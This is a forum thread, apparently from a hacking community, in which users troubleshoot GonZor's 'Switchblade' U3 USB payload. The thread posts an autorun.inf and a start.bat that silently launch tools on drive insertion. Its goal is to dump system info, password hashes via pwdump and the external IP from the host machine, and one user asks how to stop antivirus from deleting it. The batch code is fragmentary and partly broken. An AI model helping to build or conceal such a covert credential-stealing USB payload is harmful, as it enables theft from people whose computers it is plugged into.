~Gozor~ Finished Payload

setzer1411

So...I've been doing a little work here, to see if I can get any different results.  :???: Now, when I use GonZor's Payload, and manually run "go.bat" (because it won't run unless I do; Amish technique), then the script runs, but VERY quickly. I end up with no log.

Now I'm trying to rig up something that could possibly work, since the suggestion of a (dir) list of files in someone else's Switchblade may be out. That would help though.

So here it goes:

I'm trying to mount these files into the CD portion:

start.bat

@echo off

for %%i in (B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist set dir=%%i

cd /e %dir%:

cd /e SYSTEM (How would I change the letter drive (e:) to a wild (any) drive?)

nircmd.exe execmd e:SYSTEMSRCgo.bat (Maybe attaching the Amish technique in a script could work?)

LAUNCHU3.EXE execmd e:LAUNCHU3.exe (Please tell me if this has anything to do with the Payload!)

Don't ask why the letter drives say e:; I'm learning.  :D

Autorun.inf

[Autorun]

open=start.bat

LAUNCHPAD.ZIP

LAUNCHPAD

cleanup.exe

Launchpad Removal.exe

LaunchPad.exe

Loading.gif

Loading.htm

LPHelp-ch.chm

LPHelp-de.chm

LPHelp-en.chm

LPHelp-es.chm

LPHelp-fr.chm

LPHelp-it.chm

LPHelp-jp.chm

SanDiskFormatExtension.dll

SanDiskFormatExtension.dll.sig

SanDiskSecurityExtension.dll

SanDiskSecurityExtension.dll.sig

U3AccessGrant.exe

u3dapi10.dll

U3LauncherSetup.msi

version.dat

SYSTEM/SRC

SRC contains GonZor's Payload; IE: all files from U3CUSTOM.

LAUNCHU3

LAUNCHU3.EXE

There are no files in the removable drive section. Should there be?

Now: further testing. If I place GonZor's Payload on the Removable Partition, then I still have to use the Amish technique, and the progs are susceptible to AV deletion, which happened before, but GonZor's Payload gave me a successful log. What the hell.

• Replies 220
  • Created
  • Last Reply

Top Posters In This Topic

First off, GonZor will be away for two days, so I'll do my best to help you.

Before you run the universal customizer, delete all of the files you have on your flash partition (besides system and the like), this will prevent installation errors.

My first recommendation would be to reinstall the Payload using the universal customizer and reflashing your u3 partition.

Follow the instructions here: http://www.users.on.net/~simmo_89/switchblade/tutorial.html

Then open sbconfig and check Dump System Info, make sure u3 launchpad is turned off (The button should read "Turn U3 Launchpad On", make sure the payload status button reads "Turn PL Off", click update Config then quit and select yes when it asks if you want to save your settings.

Try that and let me know if you still have any issues.  It should take only a couple minutes to flash your usb drive, any longer and you may be having problems.

Nope still getting nothing. I've played around with the settings for SB Config, and nothing works. I can't get U3 or the payload to start on insertion of the drive. I tried manually running go.cmd, and all the files ran by quickly, leaving no log. I think it is trying to write the files to the CD section of the drive, and not the logs folder in the writable section.

Nope. I did exactly what you said, and still getting nothing. Autorun is not working when the drive is inserted in the computer, and when go.bat is executed manually through cmd, all the programs run through quickly, about 2-3 seconds, and still no log is left.

UPDATE!

I installed all the files to the CD Partition, and although that did not work, I copied the whole dir to the removable section, and lo and behold, after manually running go.bat, it worked! A log was created!

Now that I can get a log, how do I go about making it so these cannot be deleted by an AV? WITHOUT USING CSRSS? That does not work.

• 2 weeks later...

Im going to ask you an stupid question but ive installed your payload v2.0 followed all instruction for downloading and installing ..

I put sbconfig in the flash partition and all of that but i have no cluw where this is dumping the information from my own system is it going to my email or what i dont understand help...thanks

Have a 1GB SanDisk Cruzer Micro that's about two years old, was running fine using MD 1. 0, 1. 1 and 1. 2 payload (except for the fact that I couldn't update the Pwdump. exe in the 1. 2 payload), I tried running Gonzors setup, no go.  I unzipped the folders into C:, replaced the U3CUSTOM ISO image, and ran the Universal Customizer prog.  It formated the drive, got to 55%, opened up the two drives, stopped, and said "Faled to access your U3 smart drive. "  I tried closing out all other progs, re-tried it several times, same error.  Reloaded the U3 software on it and have the MD progs on there, but McAfee and Symantec both catch the PWdump prog and automatically delete it.  Any ideas?

• 2 weeks later...
  • 1 year later...

Hi,

I installed this, and have tested this on 6 different computers, and can't seem to get the External iP.. all it says in the log file is "External IP Dumped" Do I need the ip.shtml, and if so, where do I put it.

Thanks,

Ben

• 2 weeks later...
Hi,

I installed this, and have tested this on 6 different computers, and can't seem to get the External iP.. all it says in the log file is "External IP Dumped" Do I need the ip.shtml, and if so, where do I put it.

Thanks,

Ben

Yes, put it in the root of the usb drive also check for firewalls, as they will sometimes block this sort of thing.